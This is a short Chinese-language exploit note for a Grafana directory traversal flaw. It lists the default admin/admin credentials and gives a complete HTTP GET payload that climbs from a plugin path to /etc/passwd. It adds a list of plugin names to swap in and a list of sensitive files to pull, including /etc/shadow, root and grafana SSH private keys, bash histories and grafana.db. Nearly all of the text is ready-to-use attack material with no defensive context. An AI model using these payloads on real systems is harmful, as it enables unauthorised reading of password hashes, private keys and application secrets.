grafana 目录遍历漏洞

默认用户名密码

admin/admin

payload

  1. GET /public/plugins/alertmanager/../../../../../../../../etc/passwd HTTP/1.1
  2. Host: xxxxxx
  3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Connection: close
  8. Cookie: redirect_to=%2F
  9. Upgrade-Insecure-Requests: 1

alertmanager为插件

也可以尝试替换其中的插件

  1. alertmanager
  2. grafana
  3. loki
  4. postgres
  5. grafana-azure-monitor-datasource
  6. mixed
  7. prometheus
  8. cloudwatch
  9. graphite
  10. mssql
  11. tempo
  12. dashboard
  13. influxdb
  14. mysql
  15. testdata
  16. elasticsearch
  17. jaeger
  18. opentsdb
  19. zipkin
  20. alertGroups
  21. bargauge
  22. debug
  23. graph
  24. live
  25. piechart
  26. status-history
  27. timeseries
  28. alertlist
  29. candlestick
  30. gauge
  31. heatmap
  32. logs
  33. pluginlist
  34. table
  35. welcome
  36. annolist
  37. canvas
  38. geomap
  39. histogram
  40. news
  41. stat
  42. table-old
  43. grafana-clock-panel

敏感路径

  1. /conf/defaults.ini
  2. /etc/grafana/grafana.ini
  3. /etc/passwd
  4. /etc/shadow
  5. /home/grafana/.bash_history
  6. /home/grafana/.ssh/id_rsa
  7. /root/.bash_history
  8. /root/.ssh/id_rsa
  9. /usr/local/etc/grafana/grafana.ini
  10. /var/lib/grafana/grafana.db
  11. /proc/net/fib_trie
  12. /proc/net/tcp
  13. /proc/self/cmdline